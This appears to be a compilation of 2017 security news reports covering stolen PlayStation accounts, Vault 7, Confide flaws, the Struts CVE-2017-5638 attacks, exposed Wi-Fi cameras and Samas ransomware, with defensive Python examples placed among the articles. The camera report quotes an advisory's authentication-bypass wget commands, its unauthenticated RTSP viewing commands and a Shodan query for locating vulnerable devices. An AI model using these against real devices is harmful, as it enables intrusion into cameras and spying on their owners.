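    "notes.txt": b"meeting notes: rotate creds Q2",  # 30 bytes, original deleted
    "server.log": b"ERR disk full\n" * 10,         # 140 bytes, original deleted
}
ENCRYPTED = {name + ".zXz": rc4(REUSED_KEY, data) for name, data in ORIGINALS.items()}


def recover_files():
    """Use the surviving (report.docx, report.docx.zXz) pair to recover the
    keystream, then apply it to the other .zXz files on the disk."""
    keystream = recover_keystream(ORIGINALS["report.docx"], ENCRYPTED["report.docx.zXz"])
    results = {}
    for name in ("notes.txt", "server.log"):
        data, complete = decrypt_with_keystream(keystream, ENCRYPTED[name + ".zXz"])
        results[name] = (data, complete)
    return keystream, results


if __name__ == "__main__":
    ks, res = recover_files()
    print(f"recovered {len(ks)} keystream bytes")
    for name, (data, complete) in res.items():
        print(f"{name}: {'fully' if complete else 'partially'} recovered, {len(data)} bytes")
```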


640,000 stolen PlayStation accounts being sold on the Dark Web
10.3.2017 securityaffairs Incindent

The seller, who goes online with the moniker SunTzu583, is offering 640,000 PlayStation accounts for USD 35.71 (0.0292 BTC); their source is still a mystery.
The dark web is the place to buy stolen login credentials for major web services. Last week colleagues at HackRead reported the sale of more than 1 million Gmail and Yahoo accounts by a seller who goes online with the “SunTzu583” moniker.

A few days later, the same vendor that was offering Gmail and Yahoo accounts for sale started selling PlayStation accounts.

Playstation accounts

SunTzu583 is offering 640,000 PlayStation accounts for sale for USD 35.71 (0.0292 BTC). The source of the stolen accounts is not clear; the dump includes emails and clear-text passwords.

SunTzu583 confirmed that the archive was not directly stolen from the PlayStation Network, but that it does contain unique accounts of PlayStation users. The seller added that even if the accounts may work for other web services, they are first of all PlayStation accounts.

A few months ago, several PlayStation users reported that their accounts had been hacked and that crooks had stolen their funds. Sony denied that its servers were hacked and added that the PlayStation accounts were accessed using credentials from third-party data breaches.

At the time I was writing, there was no confirmation of the authenticity of the 640,000 PlayStation accounts.

In any case, it is advisable to change the password for PlayStation accounts and, as usual, for every other website where the same login credentials are used.

Recently other gaming platforms were hacked, including the Clash of Clans forum, ESEA, and Epic Games.


Avast: WikiLeaks Documents Do Not Reveal Security Holes

9.3.2017 Novinky/Bezpečnost BigBrother
The documents published by the WikiLeaks server do not reveal any security holes at the Czech company Avast, and moreover they are two years old. Avast vice president Sinan Eren said this in response to reports that Avast appears in the WikiLeaks documents as one of the security software vendors targeted by the US Central Intelligence Agency (CIA).
The WikiLeaks portal published around 8,000 pages of documents on the CIA's offensive software arsenal, with which the largest US intelligence organization can penetrate mobile phones, smart TVs and other electronic devices and use them to gather information.

“Avast is mentioned in the published documents, as are other global security companies. However, the published documents do not reveal any security holes in Avast. Moreover, these are publicly available documents and conference presentations that are two years old,” Eren said.

The documents contain enough technical detail
According to Pavel Bašta, a security expert at the CZ.NIC association, there may be two reasons for the CIA's interest in Avast, one of the world's largest suppliers of security software. “Avast supplies security solutions used by hundreds of millions of users around the world, and from the CIA's point of view it could be interesting if it managed to fool these security solutions so that they would not recognize malware created by the CIA while continuing to inform users about other infections,” he said.

“The second factor may be that, like any other widely distributed software, Avast's products could serve to spread malicious programs if the CIA managed to find a suitable exploitable flaw in these products,” he added.

According to the Reuters agency, the published documents contain enough technical detail for security experts and security software vendors to understand how extensive the security holes are. However, they provide few details that could help with a quick fix.

Avast, founded in 1988, develops security software, and its antivirus programs protect over 400 million computers and mobile devices worldwide. Last year it bought the competing Czech company AVG.


Danger Frightens Security Experts, Number of Attacks Rising

9.3.2017 Novinky/Bezpečnost Viry
The most widespread cyber threat in February was the malicious code Danger. Security experts warned above all that the number of attacks by this uninvited guest is rising dramatically. This follows from an analysis by the antivirus company Eset.
Danger was the most widespread threat of all last year. At the beginning of this year, however, its share began to fall noticeably. Everything thus suggested that this uninvited guest was in retreat.

Now, however, the opposite turns out to be true. “In January we recorded a significant drop in detections of this malware. Month on month it fell by 40 percentage points. In February, however, the share of the Danger downloader in overall internet threats began to rise again, to more than 20 percent,” said Miroslav Dvořák, technical director of Eset.

The virus, with the full name JS/Danger.ScriptAttachment, is very dangerous. It opens a back door into the operating system. Attackers can then use it to smuggle further malicious code into the infected computer; most often they spread extortion viruses from the ransomware family this way.

Adwind and Nemucod also pose a threat
Danger, however, is not the only malicious code giving security experts headaches. “In February the malicious code Adwind also strengthened, accounting for 6.86 percent of captured detections. It is a backdoor that targets systems supporting the Java runtime environment,” Dvořák said.

“Adwind works as a back door. This means it sends information about the infected system and receives commands from a remote attacker. These may include, for example, displaying a message on the system, opening a specific web page, updating the malware, or downloading and running a file,” he added.

He also stressed that Adwind had a 6.86% share in the past month. That is only marginally more than the third most widespread threat, the malicious code Nemucod. With this virus too, cyber pirates can download further malicious code to the infected machine, similarly to Danger.

An overview of the ten most widespread virus threats for the past month can be found in the table below:

Ten most widespread computer threats in the Czech Republic – February 2017
1. JS/Danger.ScriptAttachment (20,94 %)
2. Java/Adwind (6,86 %)
3. JS/TrojanDownloader.Nemucod (6,33 %)
4. JS/ProxyChanger (4,36 %)
5. JS/TrojanDownloader.Agent.PQT (2,48 %)
6. Win32/Adware.ELEX (1,56 %)
7. Win32/Packed.VMProtect.AAA (1,56 %)
8. Win32/Packed.VMProtect.ABO (1,48 %)
9. JS/Kryptik.RE (1,24 %)
10. Win32/GenKryptik (1,24 %)


Researchers discovered severe flaws in Confide, which is also used by White House staffers
9.3.2017 securityaffairs Vulnerebility

Confide App, the secure messaging app used by staffers in the White House and on Capitol Hill is not as secure as the company claims.
Confide is the secure messaging app used by President Donald Trump’s staffers for their secret communication. The official website of the application defines the encryption implemented by the mobile application with this statement:

“Confide uses military-grade end-to-end encryption to keep your messages safe and to ensure they can only be read by the intended recipients.” states the website.

The app lets users send encrypted, self-destructing messages and advertises end-to-end encryption.

News of the day is that two separate studies revealed that the Confide app is not as secure as previously thought.

The experts at the security firm IOActive discovered multiple critical flaws in the Confide app while auditing version 1.4.2 for Windows, Mac OS X, and Android. The researchers ethically reported them to the Confide development team, which quickly resolved the issues.

“During the evaluation, multiple security vulnerabilities of varying severities were identified, with corresponding attacker exploitation risks ranging from account impersonation and message tampering, to exposing user contact details and hijacking accounts.” reads the analysis published by IOActive.
According to IOActive, the Confide flaws could be exploited for the following purposes:

Hijack an account session or guess a password to impersonate contacts. The Confide app failed to prevent brute-force attacks on account passwords.
Spy on contact details of Confide users (i.e. real names, email addresses, and phone numbers).
Intercept a conversation and decrypt messages. The researchers discovered that it is possible to launch MiTM attacks because the app’s notification system didn’t require any valid SSL server certificate to communicate. An attacker can capture messages in transit.
Modify the contents of a message or attachment in transit without first decrypting it.
Send malformed messages that can crash or slow the Confide application.
According to the research paper published by IOActive, the researchers gained access to more than 7,000 account records created between February 22 and 24, out of a database containing between 800,000 and 1 million records.

During their 2-day test, the team was able to find a Donald Trump associate and several employees from the Department of Homeland Security (DHS) who downloaded the Confide app.

Below is the timeline disclosed by IOActive:

February 2017: IOActive conducts testing on the Confide application.
February 25, 2017: Confide begins fixing issues uncovered by the detection of anomalous behavior during the testing window.
February 27, 2017: IOActive contacts Confide via several public email addresses to establish a line of communication.
February 28, 2017: IOActive discloses issues to Confide. Confide communicates that some mitigations are already in progress and plans are being made to address all issues.
March 2, 2017: Confide releases an updated Windows client (1.4.3), which includes fixes that address some of IOActive’s findings.
March 3, 2017: Confide informs IOActive that remediation of critical issues is complete.
March 8, 2017: Findings are published.
As anticipated, a separate team of experts from Quarkslab also reviewed the code of the iOS app and demonstrated Confide exploits.

According to the experts, a series of design vulnerabilities in the Confide for iOS app could allow the company to read user messages, adding that the app didn’t notify users when encryption keys were changed.

“Confide server can read your messages by performing a man-in-the-middle attack,” reads the analysis of Quarkslab. “The end-to-end encryption used in Confide is far from reaching the state of the art. Building a secure instant messaging is not easy, but when claiming it, some strong mechanisms should really be enforced since the beginning.”

“The confidentiality of the exchanged messages depends on the robustness of TLS. Confide can technically read all the messages that pass through its servers. End-to-end encryption, as it is implemented, solely relies on the server through which the messages pass.”

“Confide is not just an encrypted messenger. It provides other interesting security features:

Screenshot prevention: Received messages can theoretically not be copied by a user. As the astute reader may have noticed, the previous paragraphs present screenshots of the application.
Message deletion: Once a user reads a message, it is deleted from the client and from the server. Is it possible to prevent message deletion?
Secrets protection: Confide handles secrets, like private keys required to decrypt messages. Are these keys correctly protected?”

The Quarkslab researchers explained that Confide server could generate its own key pair and transmit the public key to a client when requesting the public key of a recipient.

“This client then unknowingly encrypts a message that can be decrypted by the server,” the researchers added. “Finally, when the server sends the message to the recipient, it is able to re-encrypt the message with its own key for the actual recipient.”
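The key-substitution attack described in the two paragraphs above, and the mitigation Confide said it would add (independent fingerprint verification, plus alerting on key changes, which Quarkslab found missing), modelled as an added example that is not Confide's, Quarkslab's or IOActive's code. The Diffie-Hellman group, the XOR cipher, the key directory and the contact names are constructed toy parameters for illustration; the point is that a client which trusts whatever key the directory returns encrypts to the server, while a client that pins the fingerprint it saw first refuses the substituted key.

```python
"""
Added example: key substitution by the key directory, and trust-on-first-use
(TOFU) fingerprint pinning as the mitigation. Toy parameters throughout:
the DH modulus is far too small for real use and the XOR cipher is only a
stand-in for a real AEAD.
"""
import hashlib
import secrets

P = (1 << 127) - 1   # constructed toy modulus (2^127 - 1 is prime), NOT a production group
G = 3


def keygen():
    priv = secrets.randbelow(P - 2) + 1
    return priv, pow(G, priv, P)


def fingerprint(pub: int) -> str:
    """What a user would compare out of band (shortened SHA-256 of the public key)."""
    return hashlib.sha256(pub.to_bytes(16, "big")).hexdigest()[:16]


def shared_key(priv: int, peer_pub: int) -> bytes:
    return hashlib.sha256(pow(peer_pub, priv, P).to_bytes(16, "big")).digest()


def xor_stream(key: bytes, data: bytes) -> bytes:
    """Toy symmetric cipher: SHA-256 counter keystream XORed onto the data."""
    out = bytearray()
    for i, b in enumerate(data):
        block = hashlib.sha256(key + (i // 32).to_bytes(4, "big")).digest()
        out.append(b ^ block[i % 32])
    return bytes(out)


class Directory:
    """Key directory as an honest server would run it."""
    def __init__(self):
        self.keys = {}

    def register(self, name, pub):
        self.keys[name] = pub

    def lookup(self, name):
        return self.keys[name]


class CompromisedDirectory(Directory):
    """Same server, but it answers lookups for one target with a key it controls."""
    def __init__(self, target, mitm_pub):
        super().__init__()
        self.target, self.mitm_pub = target, mitm_pub

    def lookup(self, name):
        return self.mitm_pub if name == self.target else super().lookup(name)


class KeyChanged(Exception):
    """Raised when a pinned contact's key changes; the user must re-verify."""


class Client:
    def __init__(self, name, pinning):
        self.name, self.pinning = name, pinning
        self.priv, self.pub = keygen()
        self.pins = {}  # contact -> fingerprint seen on first contact (TOFU)

    def peer_key(self, directory, contact):
        pub = directory.lookup(contact)
        fp = fingerprint(pub)
        if self.pinning:
            if contact in self.pins and self.pins[contact] != fp:
                raise KeyChanged(f"{contact}: pinned {self.pins[contact]}, server now says {fp}")
            self.pins.setdefault(contact, fp)
        return pub

    def encrypt_to(self, directory, contact, msg):
        return xor_stream(shared_key(self.priv, self.peer_key(directory, contact)), msg)

    def decrypt_from(self, sender_pub, ct):
        return xor_stream(shared_key(self.priv, sender_pub), ct)


def run_scenario(pinning: bool) -> str:
    """Alice first talks to Bob through an honest directory; the directory then
    starts substituting its own key for Bob's. Returns what the server read,
    or a 'blocked' string when pinning stopped the substitution."""
    alice, bob = Client("alice", pinning), Client("bob", pinning)
    honest = Directory()
    honest.register("alice", alice.pub)
    honest.register("bob", bob.pub)
    ct = alice.encrypt_to(honest, "bob", b"hello bob")
    assert bob.decrypt_from(alice.pub, ct) == b"hello bob"   # normal exchange works

    mitm_priv, mitm_pub = keygen()
    evil = CompromisedDirectory("bob", mitm_pub)
    evil.register("alice", alice.pub)
    evil.register("bob", bob.pub)
    try:
        ct = alice.encrypt_to(evil, "bob", b"the secret")
    except KeyChanged as e:
        return f"blocked: {e}"
    # Server side: decrypt with its own private key and Alice's public key.
    # It could then re-encrypt for Bob, and neither party would notice.
    return xor_stream(shared_key(mitm_priv, alice.pub), ct).decode()
```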

What is the company's reply?

In response to the analysis conducted by Quarkslab, Confide co-founder and president Jon Brod explained that the researchers have intentionally undermined the security of their own system to bypass several layers of Confide’s protection.

“The researchers intentionally undermined the security of their own system to bypass several layers of Confide’s protection, including application signatures, code obfuscation, and certificate pinning. The attack that they claim to be demonstrating does not apply to legitimate users of Confide, who are benefiting from multiple security protections that we have put in place. Undermining your own security or taking complete control of a device makes the entire device vulnerable, not just the Confide app.” said Brod.

Confide has released a version that fixes the critical vulnerabilities discovered by the researchers. According to the company, there is no evidence of their exploitation by attackers in the wild.


Patch Apache Struts 2 Now! Hackers are exploiting a remote code execution zero-day in the wild
9.3.2017 securityaffairs Exploit

Researchers have spotted a remote code execution zero-day in Apache Struts 2; the flaw is being exploited by threat actors in the wild.
Security researchers have spotted a remote code execution zero-day, tracked as CVE-2017-5638, in Apache Struts 2, and the bad news is that threat actors in the wild are already exploiting it.

According to the experts from Cisco Talos, the flaw affects the Jakarta-based file upload Multipart parser in Apache Struts 2, and sysadmins need to urgently apply the security upgrade. CVE-2017-5638 is documented at Rapid7's Metasploit Framework GitHub site, and attackers in the wild are exploiting publicly available PoC code that triggers the issue.

“Talos has observed a new Apache vulnerability that is being actively exploited in the wild. The vulnerability (CVE-2017-5638) is a remote code execution bug that affects the Jakarta Multipart parser in Apache Struts, referenced in this security advisory.” reads the security advisory published by the Talos group. “Talos began investigating for exploitation attempts and found a high number of exploitation events.”

The issue was first spotted by the Chinese developer Nike Zheng; the attack sends an invalid Content-Type value to the uploader, throwing an exception that creates the condition for the remote code execution.

Attackers can exploit the vulnerability to remotely take over a system, as explained by Qualys, which also shared a probe (QID 11771 in VULNSIGS-2.3.559-2) to detect the presence of this issue.

“A remote code execution vulnerability exists in Apache Jakarta multipart parser. If exploited, this issue can allow attacker to remotely and without the need of any credentials take complete control of the system. Needless to say we think this is a high priority issue and the consequence of a successful attack is dire. The issue is triggered when the software tries to parse the Content-Type HTTP header.”

Below is an example of some simple probing attacks detected by the Talos group. The attempts are ongoing; attackers just check whether a system is vulnerable by executing a simple Linux-based command.
“The majority of the exploitation attempts seem to be leveraging a publicly released PoC that is being used to run various commands. Talos has observed simple commands (i.e. whoami) as well as more sophisticated commands including pulling down a malicious ELF executable and execution. ” reads the analysis shared by Talos.
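Since the trigger is a Content-Type value that no legitimate client sends, one defensive triage step is to hold that header to the media-type grammar it is supposed to follow. The example below is added here and is not Talos's, Qualys's or Apache's code; the log format it parses is constructed, and it is a detection aid for log review or a WAF precheck, not a substitute for upgrading Struts.

```python
"""
Added example: flag Content-Type header values that cannot be legitimate.
A well-formed value is  type "/" subtype *( ";" name "=" (token | quoted-string) )
(RFC 7231 media-type with RFC 7230 tokens). Expression delimiters such as
"%{" can never appear in a valid value, because "{" and "}" are not token
characters, so anything carrying them is worth an alert on its own.
"""
import re

TOKEN = r"[!#$%&'*+\-.^_`|~0-9A-Za-z]+"
QUOTED = r'"(?:[^"\\]|\\.)*"'
MEDIA_TYPE = re.compile(
    rf"^\s*{TOKEN}/{TOKEN}(?:\s*;\s*{TOKEN}=(?:{TOKEN}|{QUOTED}))*\s*$"
)
EXPR_MARKERS = ("%{", "${")


def check_content_type(value: str):
    """Return None for a well-formed header value, otherwise a short reason."""
    for marker in EXPR_MARKERS:
        if marker in value:
            return f"expression delimiter {marker!r} in Content-Type"
    if not MEDIA_TYPE.match(value):
        return "value does not match the media-type grammar"
    return None


# Constructed access-log excerpt: tab-separated client, request line, Content-Type.
# The second line stands in for a malformed header; the expression body is a
# placeholder, not a real payload.
SAMPLE_LOG = (
    "10.0.0.5\tPOST /upload.action\tmultipart/form-data; boundary=----WebKitFormBoundary7MA4YWxk\n"
    "10.0.0.9\tPOST /upload.action\t%{(#constructed_placeholder)}.multipart/form-data\n"
    "10.0.0.7\tGET /index.action\ttext/html; charset=utf-8\n"
    "10.0.0.9\tPOST /upload.action\tapplication/x-www-form-urlencoded\n"
    "10.0.0.4\tPOST /upload.action\tmultipart/form-data; boundary=\"with space\"\n"
)


def triage_log(log: str):
    """Return (client, request, reason) for every line whose Content-Type fails the check."""
    findings = []
    for line in log.splitlines():
        if not line.strip():
            continue
        client, request, ctype = line.split("\t", 2)
        reason = check_content_type(ctype)
        if reason:
            findings.append((client, request, reason))
    return findings


if __name__ == "__main__":
    for client, request, reason in triage_log(SAMPLE_LOG):
        print(f"{client} {request}: {reason}")
```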

Apache Struts 2

The experts also observed attacks that turn off firewall processes on the target servers and then drop malicious payloads.

“This example is a little more aggressive with its attack. The steps include stopping the Linux firewall as well as SUSE Linux firewall. Final steps include downloading a malicious payload from a web server and execution of said payload. The payloads have varied but include an IRC bouncer, a DoS bot, and a sample related to the bill gates botnet. This isn’t uncommon for Linux based compromise as a payload is downloaded and executed from a privileged account.” continues Talos.

Apache Struts 2

The researchers also observed more sophisticated attacks that attempt to trigger the issue to gain persistence on the target.

“The difference with this particular example is the attempted persistence. The adversary attempts to copy the file to a benign directory and then ensure that both the executable runs and that the firewall service will be disabled when the system boots.”


Do you want your own IoT botnet? 185,000+ Wi-Fi-connected cameras are open to hack
9.3.2017 securityaffairs BotNet

The researcher Pierre Kim revealed that more than 185,000 vulnerable Wi-Fi-connected cameras are exposed to the Internet, ready to be hacked.
According to the security advisory published by Pierre Kim via Full Disclosure, more than 185,000 vulnerable Wi-Fi-connected cameras are exposed to the Internet, a gift for crooks and hackers.

The devices are affected by the following vulnerabilities:

Backdoor account
RSA key and certificates
Pre-Auth Info Leak (credentials) within the GoAhead http server
Authenticated RCE as root
Pre-Auth RCE as root
Misc – Streaming without authentication
Misc – “Cloud” (Aka Botnet)

Locating the flawed Wi-Fi-connected cameras is quite simple using a search engine like Shodan; below is the query used by Kim to discover the vulnerable devices:

https://www.shodan.io/search?query=GoAhead+5ccc069c403ebaf9f0171e9517f40e41

At the time I was writing, the query returned 197,318 results. The vulnerabilities could be exploited by cyber criminals to recruit the devices into an IoT botnet that could be used for multiple illegal activities.

The most disconcerting aspect of the story is that a CGI script running on the Wi-Fi-connected cameras for configuring FTP is affected by a remote code execution vulnerability that was discovered back in 2015, yes two years ago.

To browse .cgi files, an attacker needs to authenticate too:

user@kali$ wget -qO- 'http://192.168.1.107/get_params.cgi?loginuse=BAD_LOGIN&loginpas=BAD_PASS'
var result="Auth Failed";
user@kali$ wget -qO- 'http://192.168.1.107/get_params.cgi?loginuse&loginpas'
var result="Auth Failed";

According to Kim, access to .ini files is not correctly checked, allowing attackers to bypass authentication by providing an empty loginuse and an empty loginpas in the URI.

Attackers can exploit the vulnerability to run commands as root or start a password-less Telnet server.

The expert discovered that a file in the file system, /system/www/pem/ck.pem, includes an Apple developer certificate with a private RSA key, and that credentials for the web server leak to an unauthenticated attacker via the system.ini and system-b.ini symbolic links.

The Wi-Fi-connected cameras run an unauthenticated real-time streaming protocol (RTSP) server; this means that if an attacker can reach the camera's TCP port 10554, he can watch what it streams.

“An attacker can use the authenticated-less RTSP server running on the camera on the port 10554/tcp to watch the streaming without authentication.

user@kali$ vlc rtsp://192.168.1.107:10554/tcp/av0_1

And:

user@kali$ vlc rtsp://192.168.1.107:10554/tcp/av0_0” explained Kim in a detailed analysis.

Another security hole is represented by the cloud capability implemented by the firmware that is enabled by default, with pre-configured connections to AWS, Alibaba, and Baidu.

In order to access the cloud, the attacker needs to use a smartphone application such as P2PWificam or Netcam360, providing the serial number of the target device.

“if the camera is online, a UDP tunnel is automatically established between the application and the camera, using the Cloud server as a relay.” he explained.

“The UDP tunnel between the attacker and the camera is established even if the attacker doesn’t know the credentials. It’s useful to note the tunnel bypasses NAT and firewall, allowing the attacker to reach internal cameras (if they are connected to the Internet) and to bruteforce credentials.” reads the security advisory.

The analysis published by the expert on GitHub includes proof-of-concept code, enjoy it.


Samas Ransomware Uses Active Directory to Infect Entire Networks

9.3.2017 securityweek Virus
Samas Ransomware Uses Active Directory for Reconnaissance and Spreads Across the Entire Network to Encrypt Files on Every Server and Computer

The actors behind Samas, a ransomware family that emerged about a year ago, are using Active Directory to perform reconnaissance and then infect entire networks, Javelin Networks says.

First detailed in March last year, Samas was observed employing publicly-available penetration testing tools for delivery, and its operators were said to have made $450,000 in ransom payments by December 2016. The malware has been targeting mainly the healthcare industry, researchers explain in a report SecurityWeek received via email.

Unlike most ransomware out there, which focuses mainly on encrypting local files, Samas spreads inside the entire network to encrypt files on every server and computer, the researchers say. This operation is performed in three steps: the attackers steal domain credentials, identify targets via Active Directory reconnaissance, and then move laterally through the network.

Javelin Networks, which compares this modus operandi with that of a worm, which usually spreads itself throughout the entire network, explains that the ransomware’s operators exploit a JBoss JMX-Console Authentication bypass (CVE-2010-0738) in front-facing servers to gain access to the network. Once inside the network, the attacker uses various tools to extract and steal domain admin credentials and act as a legitimate user.

The next step involves the identification of targets to encrypt, an operation performed by querying Active Directory, “because it stores all the corporation’s information. It’s a database that stores all users, endpoints, applications, and servers,” the researchers explain. Using the CSVDE command-line Windows utility, the attacker can obtain the necessary information without risking exposure.

The attacker can then check active hosts using the PING command, and can install the malicious module on them using yet another Windows utility: PSEXEC. Because this is a legitimate, built-in command tool that IT managers use for remote control, the attack goes undetected.

“Now the worm comes in: Samas infects one computer, and then self-propagates through the network, infecting each and every endpoint and server until the whole corporation is locked down,” Javelin Networks says. Depending on the targeted organization and the industry it is part of, this can have dramatic consequences.

The researchers also point out that every organization using Active Directory can fall victim to such attacks. “This is why Active Directory reconnaissance is so powerful and effective—an attacker can learn everything about the environment by simply querying the AD,” they say.
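As an added, defender-side example (not Javelin Networks' code), the following Python correlates the three stages described above, bulk AD export with csvde, host probing with ping and remote execution with PsExec, in endpoint process-creation telemetry. The record format, host names, users and tool paths are constructed assumptions; real 4688 or Sysmon records carry more fields, but the logic is the same.

```python
"""Added example (not Javelin Networks' code): correlating the three Samas
stages (AD export via csvde, host probing via ping, remote execution via
PsExec) in endpoint process-creation telemetry.

Assumptions: a constructed, simplified record format `ts|host|user|image|cmdline`;
real Windows 4688 / Sysmon event 1 records carry more fields, but the logic is
the same. All host names, users and paths below are constructed.
"""
import re
from collections import defaultdict
from datetime import datetime, timedelta

# Constructed sample telemetry, not real logs.
SAMPLE_LOG = """\
2017-03-07T09:12:01|WS-FIN-07|CORP\\j.doe|C:\\Windows\\System32\\csvde.exe|csvde -f ad_export.csv
2017-03-07T09:12:40|WS-FIN-07|CORP\\j.doe|C:\\Windows\\System32\\PING.EXE|ping -n 1 srv-file01
2017-03-07T09:12:41|WS-FIN-07|CORP\\j.doe|C:\\Windows\\System32\\PING.EXE|ping -n 1 srv-db02
2017-03-07T09:12:42|WS-FIN-07|CORP\\j.doe|C:\\Windows\\System32\\PING.EXE|ping -n 1 ws-hr-03
2017-03-07T09:12:43|WS-FIN-07|CORP\\j.doe|C:\\Windows\\System32\\PING.EXE|ping -n 1 ws-hr-04
2017-03-07T09:15:10|WS-FIN-07|CORP\\j.doe|C:\\Tools\\PsExec.exe|psexec \\\\srv-file01 -c stage.exe
2017-03-07T09:15:12|WS-FIN-07|CORP\\j.doe|C:\\Tools\\PsExec.exe|psexec \\\\srv-db02 -c stage.exe
2017-03-07T10:02:00|WS-IT-01|CORP\\admin.ops|C:\\Tools\\PsExec.exe|psexec \\\\srv-print01 ipconfig
2017-03-07T11:30:00|WS-IT-01|CORP\\admin.ops|C:\\Windows\\System32\\PING.EXE|ping -n 4 8.8.8.8
"""

PING_TARGET = re.compile(r"^ping\s+(?:-\S+\s+\S+\s+)*(\S+)", re.I)
UNC_TARGET = re.compile(r"\\\\([\w.-]+)")
STAGES = {"ad_export", "host_probe", "remote_exec"}


def parse(line):
    """Split one record into a dict; image is reduced to its lower-case basename."""
    ts, host, user, image, cmd = line.split("|", 4)
    return {"ts": datetime.fromisoformat(ts), "host": host, "user": user,
            "image": image.rsplit("\\", 1)[-1].lower(), "cmd": cmd.strip()}


def classify(ev):
    """Map a process-creation event to a Samas stage and the host it touches."""
    if ev["image"] == "csvde.exe":
        return "ad_export", None            # bulk Active Directory export
    if ev["image"] == "ping.exe":
        m = PING_TARGET.match(ev["cmd"])
        return "host_probe", (m.group(1).lower() if m else None)
    if ev["image"] in ("psexec.exe", "psexec64.exe"):
        m = UNC_TARGET.search(ev["cmd"])
        return "remote_exec", (m.group(1).lower() if m else None)
    return None, None


def detect(log_text, window=timedelta(minutes=10), min_probes=3):
    """Alert per (host, user) when all three stages fall inside `window`.

    A ping sweep only counts as host_probe if at least `min_probes` distinct
    hosts were probed, so an admin pinging one box does not trip the rule.
    """
    by_actor = defaultdict(list)
    for line in log_text.splitlines():
        if not line.strip():
            continue
        ev = parse(line)
        stage, target = classify(ev)
        if stage:
            by_actor[(ev["host"], ev["user"])].append((ev["ts"], stage, target))

    alerts = []
    for (host, user), events in by_actor.items():
        events.sort(key=lambda e: e[0])
        for i, (t0, _, _) in enumerate(events):
            win = [e for e in events[i:] if e[0] - t0 <= window]
            probed = {t for _, s, t in win if s == "host_probe" and t}
            seen = {s for _, s, _ in win}
            if len(probed) < min_probes:
                seen.discard("host_probe")
            if STAGES <= seen:
                alerts.append({
                    "host": host, "user": user, "start": t0,
                    "probed": sorted(probed),
                    "remote_exec_targets": sorted(
                        {t for _, s, t in win if s == "remote_exec" and t}),
                })
                break   # one alert per actor is enough
    return alerts


if __name__ == "__main__":
    for alert in detect(SAMPLE_LOG):
        print(alert)
```

The admin on WS-IT-01 runs PsExec and ping too, but never exports AD and never sweeps, so only the chain on WS-FIN-07 produces an alert.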

According to Javelin Networks’ report, Samas has been mainly focused on organizations in the United States over the past year, but entities in Europe and Asia were also targeted.


Several Flaws Found in Navetti Pricing Product

9.3.2017 securityweek Vulnerability
Researchers at SEC Consult have discovered several potentially serious vulnerabilities in a popular pricing solution from Sweden-based company Navetti. The vendor has released a software update that patches the flaws.

Navetti PricePoint is a piece of software designed for controlling, managing and measuring all aspects of an organization’s pricing. According to the company, its product is used by several major organizations, including ABB, Husqvarna, Scania and Electrolux.

SEC Consult has conducted a quick security check of the Navetti PricePoint product and identified four types of vulnerabilities, including SQL injection, stored and reflected cross-site scripting (XSS), and cross-site request forgery (CSRF).

The security firm told SecurityWeek that the software is often accessible from the Internet, allowing attackers to remotely exploit all the vulnerabilities.

The SQL injection flaw affects search functionality, and it allows a low-privileged attacker to inject arbitrary SQL commands and gain access to the content of the application database.

The stored XSS vulnerabilities allow low-privileged users to inject malicious JavaScript payloads persistently into the application. The security holes can also be exploited to gain elevated privileges to the application by creating a new superuser account or adding the attacker’s account to the superuser group.

Both the SQL injection and stored XSS vulnerabilities require authentication, but SEC Consult said even the lowest access rights are sufficient.

The CSRF vulnerability, caused by the lack of CSRF tokens or nonces, can be exploited by getting the targeted user to access a specially crafted web page. An attacker can leverage the flaw to perform various actions on behalf of the victim, including to add or delete users, change user privileges, and modify application settings.

The reflected XSS bugs affect the filename fields of file upload dialog boxes and the code used to generate error messages within the PricePoint application. These flaws can be exploited by getting the targeted user to click on a malicious link.

The vulnerabilities were reported to Navetti in late July 2016 and they were patched on October 1 with the release of PricePoint 4.7.0.0. The vendor told SEC Consult that this version also brings other security improvements to its product.


Apple, Google Say Users Protected Against CIA Exploits

9.3.2017 securityweek BigBrothers
Apple and Google are confident that a majority of the vulnerabilities disclosed by WikiLeaks as part of the “Vault 7” release, which focuses on the hacking tools allegedly used by the U.S. Central Intelligence Agency (CIA), do not affect the latest versions of their products.

Microsoft is investigating the leaked documents, but it has yet to provide any specific information. Apple, on the other hand, said its initial analysis indicated that many of the issues mentioned in the Vault 7 leaks are patched in the latest version of its iOS operating system, and pointed out that nearly 80 percent of its customers are running the latest release.

Nevertheless, the company has promised to continue working on quickly addressing any identified flaws.

Google’s analysis is also ongoing, but the tech giant says it’s confident that the security updates and protections in Chrome and the Android operating system can shield users against many of the exploits.

The files released by WikiLeaks indicate that the CIA has had the tools and capabilities needed to hack any type of system, including mobile devices, desktop computers, networking equipment, and Internet of Things (IoT) devices.

Vulnerabilities affecting operating systems such as Android and iOS could have a critical impact as they can allow attackers to gain complete control of a device and access sensitive user information. Hackers can even obtain messages exchanged via secure applications such as Signal and Telegram without having to break their encryption.

Security firms have scrambled to assess the impact of the CIA hacking tools, but so far there is no evidence that the intelligence agency’s exploits are very sophisticated. A majority of the disclosed vulnerabilities have either been patched a long time ago, or they are considered low severity.

However, WikiLeaks has not released any of the actual exploits, making it difficult for vendors to assess the real impact. The whistleblower organization has considered providing more details to tech companies in order to allow them to fix the vulnerabilities faster.

The CIA has not commented on the authenticity of the leaked documents, but it pointed out that its mission is to collect foreign intelligence overseas in an effort to protect the U.S. from adversaries such as terrorists and hostile nation states. The CIA also noted that it is legally prohibited from spying on individuals in the United States. The agency accused WikiLeaks of jeopardizing U.S. personnel and operations.


CIA Responds to WikiLeaks Hacking Tool Dump

9.3.2017 securityweek BigBrothers

CIA: We Are Innovative but We Don’t Spy on Fellow Americans

The U.S. Central Intelligence Agency (CIA) has issued a statement in response to the claims made by WikiLeaks in regards to the agency’s hacking tools, and denied conducting electronic surveillance on Americans.

The CIA and the FBI have launched an investigation into the Vault 7 dump and unnamed U.S. officials told Reuters that the most likely source of the breach is a CIA contractor.

In its initial press release, WikiLeaks said the files, originating from the CIA’s Center for Cyber Intelligence (CCI) in Langley, Virginia, had been circulating among former government hackers and contractors. One of them allegedly provided the data to the whistleblower organization.

The CIA has refused to comment on the authenticity of the leaked documents or the status of its investigation into this incident. However, the agency pointed out that its mission is to “aggressively collect” foreign intelligence from overseas entities in an effort to protect America from adversaries such as terrorists and hostile nation states.

“It is CIA’s job to be innovative, cutting-edge, and the first line of defense in protecting this country from enemies abroad,” the CIA said in its statement.

The nature of the tools suggests that they are designed for targeted operations – rather than mass surveillance – and the CIA pointed out that it’s legally prohibited from spying on individuals in the United States. The agency said its activities “are subject to rigorous oversight to ensure that they comply fully with U.S. law and the Constitution.”

